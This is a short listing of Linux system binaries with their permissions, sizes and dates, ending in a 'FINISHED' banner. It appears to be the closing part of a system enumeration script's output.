-rwxr-xr-x 1 root root   47288 Jan 18  2018 /usr/bin/tr
-rwxr-xr-x 1 root root   43224 Jan 18  2018 /usr/bin/uniq
-rwxr-xr-x 1 root root   47360 Oct 10  2018 /usr/bin/vmtoolsd
-rwxr-xr-x 1 root root  182552 Dec 18  2017 /usr/lib/accountsservice/accounts-daemon
-rwxr-xr-x 1 root root  671392 Oct  3  2018 /usr/sbin/apache2
-rwxr-xr-x 1 root root  671392 Oct  3  2018 /usr/sbin/apache2
-rwxr-xr-x 1 root root   47416 Nov 16  2017 /usr/sbin/cron
-rwsr-xr-x 1 root root 1140200 Feb 14  2018 /usr/sbin/exim4
-rwxr-xr-x 1 root root  790472 Aug 10  2018 /usr/sbin/named
-rwxr-xr-x 1 root root  247832 Aug  6  2018 /usr/sbin/nmbd
-rwxr-xr-x 1 root root  680488 Apr 24  2018 /usr/sbin/rsyslogd
-rwxr-xr-x 1 root root   84064 Aug  6  2018 /usr/sbin/smbd
-rwxr-xr-x 1 root root  786856 Feb 10  2018 /usr/sbin/sshd
-rwxr-xr-x 1 root root  168200 Feb  5  2018 /usr/sbin/vsftpd
---

==================================( FINISHED )==================================